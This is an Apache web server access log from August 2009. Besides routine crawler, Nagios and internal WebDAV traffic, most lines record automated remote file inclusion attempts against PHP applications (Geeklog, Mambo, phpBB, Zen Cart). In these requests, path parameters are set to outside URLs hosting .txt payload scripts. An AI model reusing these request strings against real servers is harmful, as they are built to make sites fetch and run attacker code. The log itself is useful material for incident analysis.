203.236.100.30 - - [12/Aug/2009:07:43:55 -0400] "GET /logs/error_log.Q109071700%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
203.236.100.30 - - [12/Aug/2009:07:43:55 -0400] "GET /logs/error_log.Q109071500%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
203.236.100.30 - - [12/Aug/2009:07:43:59 -0400] "GET /logs/access_log.Q109071500%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
203.236.100.30 - - [12/Aug/2009:07:43:59 -0400] "GET /logs/error_log.Q109071700%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
203.236.100.30 - - [12/Aug/2009:07:43:59 -0400] "GET /logs/access_log.Q109071700%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
203.236.100.30 - - [12/Aug/2009:07:43:59 -0400] "GET /logs/error_log.Q109071500%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
203.236.100.30 - - [12/Aug/2009:07:44:01 -0400] "GET /logs/access_log.Q109071500%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
203.236.100.30 - - [12/Aug/2009:07:44:09 -0400] "GET /logs/access_log.Q109071500%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
172.16.1.180 - - [12/Aug/2009:07:44:42 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:07:44:42 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:07:44:42 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
72.30.81.182 - - [12/Aug/2009:07:44:49 -0400] "GET /logs/access_log.Q107092200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
117.110.74.195 - - [12/Aug/2009:07:45:10 -0400] "GET /logs/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:07:45:10 -0400] "GET /logs/access_log.Q109071200%20%20/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:07:45:12 -0400] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:07:45:27 -0400] "GET /logs/access_log.Q109061100%20%20/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
172.16.1.180 - - [12/Aug/2009:07:45:45 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:07:45:45 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:07:45:45 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [12/Aug/2009:07:46:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
116.122.158.207 - - [12/Aug/2009:07:46:26 -0400] "GET /logs/access_log.Q109062800%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:07:46:26 -0400] "GET /plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:07:46:26 -0400] "GET /logs/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:07:46:26 -0400] "GET /logs/access_log.Q109062800/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:07:46:26 -0400] "GET /logs/error_log.Q109062800/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:07:46:26 -0400] "GET /logs/error_log.Q109062800%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:07:46:40 -0400] "GET /logs/error_log.Q109062800/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:07:46:41 -0400] "GET /plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:07:46:41 -0400] "GET /logs/access_log.Q109062800%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:07:46:45 -0400] "GET /logs/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:07:46:46 -0400] "GET /logs/error_log.Q109062800%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:07:46:46 -0400] "GET /logs/access_log.Q109062800/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:07:46:47 -0400] "GET /logs/error_log.Q109071700%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:07:46:47 -0400] "GET /logs/access_log.Q109071700%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
172.16.1.180 - - [12/Aug/2009:07:47:02 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:07:47:02 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:07:47:02 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
116.122.158.207 - - [12/Aug/2009:07:47:02 -0400] "GET /logs/error_log.Q109071500%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:07:47:02 -0400] "GET /logs/access_log.Q109071500%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
125.243.207.199 - - [12/Aug/2009:07:47:07 -0400] "GET /logs/access_log.Q109062800/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
125.243.207.199 - - [12/Aug/2009:07:47:07 -0400] "GET /logs/error_log.Q109062800%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
125.243.207.199 - - [12/Aug/2009:07:47:07 -0400] "GET /plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.243.207.199 - - [12/Aug/2009:07:47:07 -0400] "GET /logs/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
125.243.207.199 - - [12/Aug/2009:07:47:07 -0400] "GET /logs/access_log.Q109062800%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
125.243.207.199 - - [12/Aug/2009:07:47:07 -0400] "GET /logs/error_log.Q109062800/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
125.243.207.199 - - [12/Aug/2009:07:47:12 -0400] "GET /plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.243.207.199 - - [12/Aug/2009:07:47:12 -0400] "GET /logs/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
125.243.207.199 - - [12/Aug/2009:07:47:12 -0400] "GET /logs/error_log.Q109062800/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
125.243.207.199 - - [12/Aug/2009:07:47:12 -0400] "GET /logs/access_log.Q109062800/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
125.243.207.199 - - [12/Aug/2009:07:47:12 -0400] "GET /logs/error_log.Q109062800%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
125.243.207.199 - - [12/Aug/2009:07:47:12 -0400] "GET /logs/access_log.Q109062800%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
125.243.207.199 - - [12/Aug/2009:07:47:18 -0400] "GET /logs/access_log.Q109071700%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
125.243.207.199 - - [12/Aug/2009:07:47:18 -0400] "GET /logs/error_log.Q109071700%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
125.243.207.199 - - [12/Aug/2009:07:47:22 -0400] "GET /logs/error_log.Q109071500%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
125.243.207.199 - - [12/Aug/2009:07:47:22 -0400] "GET /logs/access_log.Q109071500%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
125.243.207.199 - - [12/Aug/2009:07:47:23 -0400] "GET /logs/access_log.Q109071700%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
125.243.207.199 - - [12/Aug/2009:07:47:23 -0400] "GET /logs/error_log.Q109071700%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
125.243.207.199 - - [12/Aug/2009:07:47:28 -0400] "GET /logs/error_log.Q109071500%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
125.243.207.199 - - [12/Aug/2009:07:47:28 -0400] "GET /logs/access_log.Q109071500%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:07:47:34 -0400] "GET /logs/error_log.Q109071700%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:07:47:51 -0400] "GET /logs/access_log.Q109071200/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:07:47:56 -0400] "GET /logs/access_log.Q109061100/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:07:47:59 -0400] "GET /logs/access_log.Q109071700%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:07:48:13 -0400] "GET /logs/access_log.Q109071500%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:07:48:13 -0400] "GET /logs/error_log.Q109071500%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
172.16.1.180 - - [12/Aug/2009:07:48:24 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:07:48:24 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:07:48:24 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
210.114.174.160 - - [12/Aug/2009:07:50:46 -0400] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.srch.or.kr/bbs/images/fx29id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
210.114.174.160 - - [12/Aug/2009:07:50:48 -0400] "GET /logs/access_log.Q109051100/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.srch.or.kr/bbs/images/fx29id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
210.114.174.160 - - [12/Aug/2009:07:50:49 -0400] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.srch.or.kr/bbs/images/fx29id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
210.114.174.160 - - [12/Aug/2009:07:50:53 -0400] "GET /logs/access_log.Q109071500/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.srch.or.kr/bbs/images/fx29id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Aug/2009:07:51:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.73 - - [12/Aug/2009:07:51:17 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.73 - - [12/Aug/2009:07:51:17 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.73 - - [12/Aug/2009:07:51:17 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [12/Aug/2009:07:51:18 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [12/Aug/2009:07:51:18 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [12/Aug/2009:07:51:18 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [12/Aug/2009:07:51:51 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [12/Aug/2009:07:51:51 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [12/Aug/2009:07:51:51 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
72.30.81.182 - - [12/Aug/2009:07:51:52 -0400] "GET /logs/error_log.Q109061600 HTTP/1.0" 200 3174227 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.81.182 - - [12/Aug/2009:07:51:52 -0400] "GET /logs/error_log.Q109061600 HTTP/1.0" 200 3174227 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
172.16.1.168 - - [12/Aug/2009:07:53:01 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [12/Aug/2009:07:53:01 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [12/Aug/2009:07:53:01 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [12/Aug/2009:07:53:33 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [12/Aug/2009:07:53:33 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [12/Aug/2009:07:53:33 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
95.108.142.130 - - [12/Aug/2009:07:54:33 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Yandex/1.01.001 (compatible; Win16; H)"
210.114.174.160 - - [12/Aug/2009:07:54:47 -0400] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.srch.or.kr/bbs/images/fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.114.174.160 - - [12/Aug/2009:07:54:48 -0400] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.srch.or.kr/bbs/images/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
95.108.142.130 - - [12/Aug/2009:07:54:51 -0400] "GET / HTTP/1.1" 200 409 "-" "Yandex/1.01.001 (compatible; Win16; H)"
192.138.74.36 - - [12/Aug/2009:07:55:04 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
95.108.142.130 - - [12/Aug/2009:07:55:12 -0400] "GET / HTTP/1.1" 200 409 "-" "Yandex/1.01.001 (compatible; Win16; H)"
209.59.12.99 - - [12/Aug/2009:07:56:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
207.158.22.128 - - [12/Aug/2009:07:57:28 -0400] "GET /logs/access_log.Q109080400%20%20////?_SERVER[DOCUMENT_ROOT]=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
207.158.22.128 - - [12/Aug/2009:07:57:28 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
207.158.22.128 - - [12/Aug/2009:07:57:28 -0400] "GET /logs/access_log.Q109080400%20%20////?_SERVER[DOCUMENT_ROOT]=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
207.158.22.128 - - [12/Aug/2009:07:57:28 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
207.158.22.128 - - [12/Aug/2009:07:57:28 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 200 13351 "-" "Mozilla/5.0"
207.158.22.128 - - [12/Aug/2009:07:57:28 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 200 13351 "-" "Mozilla/5.0"
207.158.22.128 - - [12/Aug/2009:07:57:36 -0400] "GET /logs/access_log.Q109073100%20%20////?_SERVER[DOCUMENT_ROOT]=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
207.158.22.128 - - [12/Aug/2009:07:57:37 -0400] "GET /logs/access_log.Q109073100%20%20////?_SERVER[DOCUMENT_ROOT]=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:07:57:38 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:07:57:38 -0400] "GET /logs/error_log.Q109072800////?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:07:57:38 -0400] "GET /logs/access_log.Q109061300////?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:07:57:38 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 13351 "-" "Mozilla/5.0"
172.16.1.88 - - [12/Aug/2009:07:57:46 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [12/Aug/2009:07:57:46 -0400] "PROPFIND /CA400 HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [12/Aug/2009:07:57:46 -0400] "PROPFIND /CA400 HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [12/Aug/2009:07:57:47 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [12/Aug/2009:07:57:47 -0400] "PROPFIND /QIbm HTTP/1.1" 405 230 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
116.122.158.207 - - [12/Aug/2009:07:57:57 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:07:57:57 -0400] "GET /logs/access_log.Q109061300////?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:07:57:57 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 13351 "-" "Mozilla/5.0"
116.122.158.207 - - [12/Aug/2009:07:57:57 -0400] "GET /logs/error_log.Q109072800////?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.209.236.77 - - [12/Aug/2009:07:58:01 -0400] "GET /logs/access_log.Q109062800////?_SERVER[DOCUMENT_ROOT]=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
195.209.236.77 - - [12/Aug/2009:07:58:01 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
195.209.236.77 - - [12/Aug/2009:07:58:01 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 200 13351 "-" "Mozilla/5.0"
195.209.236.77 - - [12/Aug/2009:07:58:16 -0400] "GET /logs/access_log.Q109053100////?_SERVER[DOCUMENT_ROOT]=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
172.16.1.180 - - [12/Aug/2009:07:59:00 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:07:59:00 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:07:59:00 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
203.236.100.30 - - [12/Aug/2009:07:59:09 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.236.100.30 - - [12/Aug/2009:07:59:09 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
